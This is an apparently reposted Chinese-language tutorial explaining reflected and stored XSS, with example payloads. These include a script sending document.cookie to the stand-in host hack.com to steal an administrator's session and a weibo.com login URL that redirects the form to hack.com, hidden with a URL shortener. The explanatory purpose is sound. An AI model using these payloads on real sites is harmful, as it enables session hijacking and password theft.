XSS 叫跨站腳本攻擊（Cross Site Script），那么XSS原本應(yīng)該叫做CSS，但是由于CSS的簡稱已經(jīng)被連級樣式表 使用了，所以就換個(gè)稱謂XSS。?

為什么叫做跨站腳本攻擊呢？
它的意思就是在別人的網(wǎng)站上嵌入腳本，而這個(gè)腳本原本不是屬于這個(gè)網(wǎng)站的。這個(gè)解釋很直觀吧。


怎么嵌入腳本呢？

比如這么個(gè)搜索結(jié)果頁，當(dāng)用戶搜索test的時(shí)候，頁面會顯示“搜索關(guān)鍵詞：test”

這個(gè)時(shí)候，這里的test就很有可能會出現(xiàn)xss漏洞，如果該頁面是直接將用戶輸入的東西“返回”到頁面上，那么存在的xss漏洞就可以這樣利用：

輸入：<script>alert(1);</scrip>
那么頁面就會跳出alert(1);
這種XSS叫做反射性XSS。


再談?wù)摿硗庖环N場景，每個(gè)網(wǎng)站都有反饋框。允許用戶反饋數(shù)據(jù)給后臺。

而這個(gè)后臺一般都是管理員進(jìn)行審核，會在管理后臺展示。

如果一個(gè)<script>var x=new Image(); x.src=” http://hack.com?cookie= ”+document.cookie;</script>的反饋數(shù)據(jù)由用戶輸入

然后這個(gè)數(shù)據(jù)“直接”返回到管理后臺上，那么這個(gè)時(shí)候，管理后臺管理員的cookie就被作為參數(shù)傳遞到 http://hack.com ?了。后面 黑客 就可以使用cookie來做登錄管理后臺了。

這種XSS由于攻擊代碼存儲進(jìn)數(shù)據(jù)庫了，所以叫做存儲型XSS。



危害
一般來說，存儲型XSS的危害性大于反射型XSS。因?yàn)榉瓷湫蚗SS只會影響到自己，而存儲型的XSS可能會影響到網(wǎng)站的其他用戶。


XSS可以如上面例子說的：

1 盜取cookie

2 釣魚
比如我將一段代碼注入進(jìn)某個(gè)網(wǎng)站的支付頁面，這段js代碼做的事情是，動態(tài)控制這個(gè)支付頁面的Form表單，比如將這個(gè)form表單的html替換成目標(biāo)網(wǎng)站一個(gè)相似的html。

或者另一個(gè)案例是使用反射型XSS，我預(yù)先生成一個(gè)url，這個(gè)url是一個(gè)有反射型xss 漏洞 的頁面。比如

      document.getElementById("loginForm").action="http://hack.com"http://weibo.com/login?username=<script>document.getElementById("loginForm").action="http://hack.com"</script>
    

?

然后我將這個(gè)頁面通過企鵝的群郵件發(fā)給企鵝群中的所有人，一旦有人點(diǎn)擊這個(gè)鏈接，那么就會進(jìn)入微博登陸頁，萬一再輸入用戶名密碼，那么這個(gè)人的用戶名密碼就會被盜了。當(dāng)然，這個(gè)案例有個(gè)問題，url太假了，怎么辦？短鏈接服務(wù)。現(xiàn)在有很多廠商提供了短連接的服務(wù)。那么最后的鏈接是實(shí)際看不出來問題的。

3 DDOS攻擊
當(dāng)然這個(gè)前提是有大量用戶已經(jīng)被XSS攻擊了，所以他們?yōu)g覽的頁面已經(jīng)被植入了代碼，這個(gè)代碼的作用就是循環(huán)向一個(gè)網(wǎng)站發(fā)送請求，如果有xss漏洞的這個(gè)網(wǎng)站是有大量用戶的，比如微博，那么后一個(gè)被DDOS攻擊的網(wǎng)站就真心慘了。

總之，XSS的危害就在于網(wǎng)站的頁面可以被隨意嵌入js代碼。

轉(zhuǎn)自 : http://anquan.baidu.com/bbs/thread-130626-1-1.html